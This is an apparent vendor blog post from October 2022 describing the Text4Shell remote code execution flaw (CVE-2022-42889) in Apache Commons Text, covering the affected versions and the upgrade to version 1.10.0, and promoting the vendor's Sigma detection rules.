Detecting Text4Shell (CVE-2022-42889), Critical RCE in Apache Commons Text

[post-views]
October 20, 2022 · 4 min read
Detecting Text4Shell (CVE-2022-42889), Critical RCE in Apache Commons Text

Threat actors don’t sleep, and cyber defenders cannot sleep a wink either to keep up with emerging threats. In 2022, a wave of critical “shell” vulnerabilities has been flooding the cyber threat arena, starting with the loud appearance of Log4Shell at the turn of the year, followed by Spring4Shell in March, then ProxyNotShell just one month ago. In October, a novel critical remote code execution (RCE) vulnerability in Apache Commons Text comes on the scene tracked as CVE-2022-42889 or Text4Shell.

Text4Shell Detection

Referred to as the next Log4Shell situation, CVE-2022-42889 poses severe risks of massive in-the-wild attacks. To protect your organizational infrastructure and detect potentially malicious activity at the earliest attack stages, explore a set of Sigma rules developed by the SOC Prime Team and our Threat Bounty authors. 

The detections are compatible with 18 SIEM, EDR, and XDR technologies and are aligned with the MITRE ATT&CK® framework addressing the Initial Access and Lateral Movement tactics, with Exploit Public-Facing Applications (T1190) and  Exploitation of Remote Services (T1210) as corresponding techniques.

Become a member of our Threat Bounty Program to monetize your Detection Engineering skills while sharpening your Sigma and ATT&CK knowledge. Imagine the code you wrote helps to detect emerging cyber attacks or prevent a power grid outage. Published to the world’s largest threat detection marketplace and explored by 30,000+ cybersecurity professionals, your detection content helps make the world a safer place while proving your expertise and granting recurrent financial benefits. 

Press the Explore Detections button to instantly access Sigma rules for CVE-2022-42889, corresponding CTI links, ATT&CK references, and threat hunting ideas.

Explore Detections

CVE-2022-42889 Description

Cybersecurity researchers have revealed a novel vulnerability in the Apache Commons Text low-level library that works on strings. The security flaw known as CVE-2022-42889 or Text4Shell exists in the StringSubstitutor interpolator object and enables unauthenticated threat actors to run remote code execution on servers hosting the compromised tool.

Apache Commons Text is an open-source library for performing multiple text operations. The Apache Software Foundation (ASF) describes the library as the one delivering additions to the standard Java Development Kit’s (JDK) text handling. Since the library is publicly accessible, the disclosure of a new critical RCE flaw affecting the product poses a threat to a wide range of organizations worldwide that rely on this software. Due to the CVE-2022-42889 severity ranking reaching 9.8 on the CVSS scale, a lot of Apache Commons Text users raised concerns about its high risks and compared it to the notorious CVE-2021-44228 aka Log4Shell, however, most cybersecurity experts suggest it is far from having an impact of such scale.  

The security flaw affects Apache Commons Text versions dating back to 2018 from 1.5 through 1.9. The PoC for CVE-2022-42889 has already been released, however, there still haven’t been any known cases of vulnerability exploitation in the wild.

The ASF issued the Apache Commons Text updates at the end of September with the details of the new security flaw and ways to remediate the threat released two weeks later, on October 13. According to this advisory, CVE-2022-42889 can be triggered over the course of the variable interpolation operations the library performs. In the library versions ranging from 1.5 and through 1.9, a set of default Lookup instances, such as “script”, “dns”, or “url”, contains interpolators that might lead to remote code execution. Cybersecurity researchers also add that individual users and organizations leveraging Java version 15 and later are likely to be beyond the risks since script interpolation won’t be applicable, however, other attack vectors through DNS or URL might lead to potential vulnerability exploitation.

As CVE-2022-42889 mitigation measures, cyber defenders recommend upgrading the potentially vulnerable library instances to version 1.10.0, which provides default settings for blocking interpolators that can be compromised. 

Boost your threat detection capabilities and accelerate threat hunting velocity equipped with  Sigma, MITRE ATT&CK, and Detection as Code to always have curated detection algorithms against any adversary TTP or any exploitable vulnerability at hand. Obtain 800 rules for existing CVEs to proactively defend against threats that matter most. Instantly reach 140+ Sigma rules for free or get all relevant detection algorithms with On Demand at https://my.socprime.com/pricing/.

Table of Contents

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts